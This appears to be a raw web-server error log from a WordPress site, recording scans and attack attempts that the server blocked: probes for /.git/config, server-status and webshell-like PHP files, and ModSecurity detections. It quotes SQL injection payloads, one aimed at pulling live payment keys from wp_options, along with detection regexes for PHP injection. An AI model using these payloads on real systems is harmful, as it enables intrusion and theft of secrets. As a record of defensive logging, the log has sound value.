(index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:37:40.670827 2024] [autoindex:error] [pid 23586:tid 140029330409216] [client 167.71.215.152:46152] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:37:46.668739 2024] [autoindex:error] [pid 22976:tid 140029363980032] [client 167.71.215.152:46160] AH01276: Cannot serve directory /home/investig/public_html/wp-content/upgrade/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Tue Jun 18 02:36:29.747949 2024] [authz_core:error] [pid 22976:tid 140029221304064] [client 138.68.86.32:51744] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/06/18 02:36:34 [error] 22936#22936: *37044 access forbidden by rule, client: 138.68.86.32, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Tue Jun 18 03:10:09.406725 2024] [:error] [pid 22974:tid 140029254874880] [client 68.183.230.248:52250] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/license.php, referer: www.google.com [Tue Jun 18 05:05:40.085470 2024] [:error] [pid 855:tid 140433728423680] [client 68.183.230.248:54354] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Tue Jun 18 05:27:29.722829 2024] [authz_core:error] [pid 854:tid 140433753601792] [client 164.92.107.174:54602] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/06/18 05:27:33 [error] 806#806: *38810 access forbidden by rule, client: 164.92.107.174, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Tue Jun 18 05:27:36.219341 2024] [authz_core:error] [pid 1725:tid 140433669674752] [client 207.154.212.47:54636] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/06/18 05:27:39 [error] 806#806: *38835 access forbidden by rule, client: 207.154.212.47, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Tue Jun 18 07:22:22.979964 2024] [authz_core:error] [pid 1725:tid 140433678067456] [client 165.22.34.189:56272] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/06/18 07:22:29 [error] 807#807: *39998 access forbidden by rule, client: 165.22.34.189, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Tue Jun 18 11:22:26.713701 2024] [autoindex:error] [pid 855:tid 140433795565312] [client 139.59.35.109:59690] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Jun 19 21:59:37.525121 2024] [autoindex:error] [pid 9580:tid 139936099444480] [client 81.94.156.169:54666] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Jun 20 12:35:09.020047 2024] [authz_core:error] [pid 1721:tid 140222067066624] [client 64.226.65.160:43636] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/06/20 12:35:12 [error] 1028#1028: *73208 access forbidden by rule, client: 64.226.65.160, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Thu Jun 20 13:48:08.089762 2024] [autoindex:error] [pid 12599:tid 140222025103104] [client 128.199.167.175:44772] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Jun 20 13:48:15.569512 2024] [autoindex:error] [pid 12599:tid 140221999924992] [client 128.199.167.175:44788] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/compat3x/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://INVESTIGACIONPERU.COM//wp-includes/js/tinymce/plugins/compat3x/css/index.php [Thu Jun 20 13:48:35.915844 2024] [:error] [pid 12599:tid 140222159386368] [client 128.199.167.175:44832] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/install.php [Thu Jun 20 17:30:21.951516 2024] [authz_core:error] [pid 12599:tid 140222041888512] [client 142.93.129.190:48096] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/06/20 17:30:26 [error] 1028#1028: *75691 access forbidden by rule, client: 142.93.129.190, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu Jun 20 18:43:41.142048 2024] [:error] [pid 1721:tid 140221983139584] [client 152.89.234.110:49038] [client 152.89.234.110] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(union(.*?)select(.*?)from)))" at ARGS:calculate_attribute_counts[][taxonomy]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "225"] [id "981276"] [msg "Looking for basic sql injection. Common attack string for mysql, oracle and others."] [data "Matched Data: union%20all%20select%201%2Coption_value%20from found within ARGS:calculate_attribute_counts[][taxonomy]: %22%29%20union%20all%20select%201%2Coption_value%20from%20wp_options%20where%20option_value%20like%20%27%25pk_live%25%27%3B%00"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "investigacionperu.com"] [uri "/wp-json/wc/store/products/collection-data"] [unique_id "ZnS-rddXznT12CajRhT5IgAAANc"] [Thu Jun 20 18:51:19.001015 2024] [authz_core:error] [pid 1721:tid 140222041888512] [client 138.197.191.87:49114] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/06/20 18:51:22 [error] 1027#1027: *76387 access forbidden by rule, client: 138.197.191.87, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Thu Jun 20 18:51:29.839235 2024] [authz_core:error] [pid 1721:tid 140221999924992] [client 172.105.16.131:49152] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/06/20 18:51:32 [error] 1028#1028: *76423 access forbidden by rule, client: 172.105.16.131, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Fri Jun 21 05:03:17.085874 2024] [:error] [pid 22263:tid 139787512026880] [client 5.188.62.140:58734] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZnVP5Ty8ekKprz6DeZxxFwAAAI0"] [Fri Jun 21 05:27:19.595124 2024] [autoindex:error] [pid 22981:tid 139787545597696] [client 43.231.234.12:58984] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jun 21 07:17:02.294532 2024] [autoindex:error] [pid 22262:tid 139787453277952] [client 43.231.234.12:60030] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Jun 21 10:00:05.870829 2024] [:error] [pid 22981:tid 139787436492544] [client 192.0.87.108:34652] [client 192.0.87.108] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:signature. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /ONE1SA= found within ARGS:signature: LFMddC1o1oB4ht6eodNj/ONE1SA="] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "ZnWVdfxptB1d3iLpbR_HTgAAANY"], referer: https://investigacionperu.com/?for=jetpack&jetpack=comms&token=Z5nUQajFXxnH%40s%29G4Tnlh9C%5E6NYFP%28XC%3A1%3A0×tamp=1718982005&nonce=e9kNtxM7pu&body-hash=%2B%2BBCriVDKZ4wtom97JPkJc9mBKs%3D&signature=LFMddC1o1oB4ht6eodNj%2FONE1SA%3D [Sat Jun 22 07:08:48.730071 2024] [autoindex:error] [pid 6525:tid 139827332761344] [client 35.178.167.95:57748] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sat Jun 22 12:16:28.366802 2024] [authz_core:error] [pid 21740:tid 140384638306048] [client 142.93.143.8:33824] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/06/22 12:16:32 [error] 21694#21694: *1075 access forbidden by rule, client: 142.93.143.8, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sat Jun 22 12:22:57.372258 2024] [authz_core:error] [pid 21740:tid 140384791021312] [client 139.59.132.8:34002] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/06/22 12:23:01 [error] 21693#21693: *1202 access forbidden by rule, client: 139.59.132.8, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sat Jun 22 12:23:06.714351 2024] [authz_core:error] [pid 21579:tid 140384646698752] [client 64.226.65.160:34044] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/06/22 12:23:10 [error] 21694#21694: *1231 access forbidden by rule, client: 64.226.65.160, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sat Jun 22 14:00:27.934015 2024] [authz_core:error] [pid 21578:tid 140384799414016] [client 172.105.197.17:35620] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/06/22 14:00:33 [error] 21693#21693: *2465 access forbidden by rule, client: 172.105.197.17, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sun Jun 23 12:52:19.863083 2024] [:error] [pid 21579:tid 140384613127936] [client 104.164.35.209:34944] [client 104.164.35.209] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "Znhg06zkHVgjQeACDmyKRwAAAJA"] [Mon Jun 24 02:32:33.278386 2024] [autoindex:error] [pid 2990:tid 140384816199424] [client 20.172.25.54:44944] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Mon Jun 24 10:56:28.591819 2024] [authz_core:error] [pid 21740:tid 140384554379008] [client 206.189.2.13:35034] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/06/24 10:56:30 [error] 21693#21693: *23861 access forbidden by rule, client: 206.189.2.13, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Mon Jun 24 11:21:29.476560 2024] [authz_core:error] [pid 2840:tid 140384579557120] [client 142.93.0.66:39270] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/06/24 11:21:29 [error] 21693#21693: *23996 access forbidden by rule, client: 142.93.0.66, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Mon Jun 24 11:21:38.688369 2024] [authz_core:error] [pid 2990:tid 140384545986304] [client 142.93.0.66:39324] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/06/24 11:21:39 [error] 21693#21693: *24032 access forbidden by rule, client: 142.93.0.66, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Mon Jun 24 14:50:41.487965 2024] [:error] [pid 2840:tid 140384562771712] [client 84.247.143.104:46632] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Mon Jun 24 14:50:45.194790 2024] [:error] [pid 2840:tid 140384646698752] [client 84.247.143.104:46672] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Mon Jun 24 14:50:45.338447 2024] [:error] [pid 2746:tid 140384596342528] [client 84.247.143.104:46674] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Mon Jun 24 14:51:00.394653 2024] [:error] [pid 21740:tid 140384596342528] [client 84.247.143.104:47014] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Mon Jun 24 14:51:03.850853 2024] [:error] [pid 2746:tid 140384571164416] [client 84.247.143.104:47038] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Mon Jun 24 14:51:04.230812 2024] [:error] [pid 2840:tid 140384807806720] [client 84.247.143.104:47042] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Mon Jun 24 14:51:13.718997 2024] [:error] [pid 2990:tid 140384629913344] [client 84.247.143.104:47124] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Mon Jun 24 14:51:18.040919 2024] [:error] [pid 2746:tid 140384596342528] [client 84.247.143.104:47164] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Mon Jun 24 14:51:18.362515 2024] [:error] [pid 21577:tid 140384579557120] [client 84.247.143.104:47168] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Mon Jun 24 14:51:32.324088 2024] [:error] [pid 2746:tid 140384638306048] [client 84.247.143.104:47308] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Mon Jun 24 14:51:34.348515 2024] [:error] [pid 2990:tid 140384799414016] [client 84.247.143.104:47330] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Mon Jun 24 14:51:34.545127 2024] [:error] [pid 2840:tid 140384596342528] [client 84.247.143.104:47332] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Mon Jun 24 17:49:35.616210 2024] [authz_core:error] [pid 1882:tid 139633010603776] [client 96.126.110.74:46602] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/06/24 17:49:38 [error] 1601#1601: *949 access forbidden by rule, client: 96.126.110.74, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/06/25 07:57:37 [error] 7700#7700: *8977 access forbidden by rule, client: 104.234.204.144, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Tue Jun 25 08:29:18.706049 2024] [core:error] [pid 18146:tid 140479446312704] (70007)The timeout specified has expired: [client 45.148.10.59:59354] AH00574: ap_content_length_filter: apr_bucket_read() failed [Tue Jun 25 12:53:13.370115 2024] [:error] [pid 18505:tid 140479668348672] [client 216.225.205.120:36346] [client 216.225.205.120] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "ZnsECRRmyrJim9zULcO3kwAAAwI"], referer: www.google.com [Tue Jun 25 12:53:13.549174 2024] [:error] [pid 18489:tid 140479471490816] [client 216.225.205.120:36348] [client 216.225.205.120] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "ZnsECZ7cKHDE-yRz2w5LYAAAApE"], referer: www.google.com [Wed Jun 26 01:48:09.915132 2024] [authz_core:error] [pid 18342:tid 140479463098112] [client 206.189.225.181:48770] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/06/26 01:48:12 [error] 7700#7700: *21223 access forbidden by rule, client: 206.189.225.181, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Wed Jun 26 03:00:38.493231 2024] [:error] [pid 18342:tid 140479580595968] [client 5.188.62.140:49706] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZnvKprJ-DrVusaWYU6KOfwAAAgQ"] 2024/06/26 07:21:36 [error] 31206#31206: *24913 access forbidden by rule, client: 192.46.208.145, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Wed Jun 26 10:37:44.769883 2024] [authz_core:error] [pid 31246:tid 140055432812288] [client 139.162.210.205:57264] AH01630: client denied by server configuration: /home/investig/public_html/server-status [Wed Jun 26 10:37:45.448059 2024] [authz_core:error] [pid 31246:tid 140055284786944] [client 138.68.86.32:57268] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/06/26 10:37:48 [error] 31205#31205: *26608 access forbidden by rule, client: 139.162.210.205, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/06/26 10:37:49 [error] 31205#31205: *26611 access forbidden by rule, client: 138.68.86.32, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Wed Jun 26 13:28:02.393712 2024] [authz_core:error] [pid 31246:tid 140055200859904] [client 139.162.155.225:59816] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/06/26 13:28:06 [error] 31205#31205: *28161 access forbidden by rule, client: 139.162.155.225, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Wed Jun 26 16:17:51.194465 2024] [:error] [pid 31244:tid 140055234430720] [client 141.98.81.52:34098] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 1238= found within ARGS:ver: 4.2.16) AND 1238=3552 AND (2032=2032"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFf-bXXCyFmkhe1iNqPQAAABI"] [Wed Jun 26 16:17:51.441928 2024] [:error] [pid 31246:tid 140055449597696] [client 141.98.81.52:34100] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 7313= found within ARGS:ver: 4.2.16) AND 7313=7313 AND (7353=7353"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFf1xchXPGtOGw21GpzwAAAIE"] [Wed Jun 26 16:17:51.682313 2024] [:error] [pid 31244:tid 140055251216128] [client 141.98.81.52:34102] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 1547= found within ARGS:ver: 4.2.16 AND 1547=7110"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFf-bXXCyFmkhe1iNqPgAAABA"] [Wed Jun 26 16:17:51.921326 2024] [:error] [pid 31244:tid 140055416026880] [client 141.98.81.52:34104] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 7313= found within ARGS:ver: 4.2.16 AND 7313=7313"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFf-bXXCyFmkhe1iNqPwAAAAU"] [Wed Jun 26 16:17:52.154168 2024] [:error] [pid 31859:tid 140055242823424] [client 141.98.81.52:34106] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match 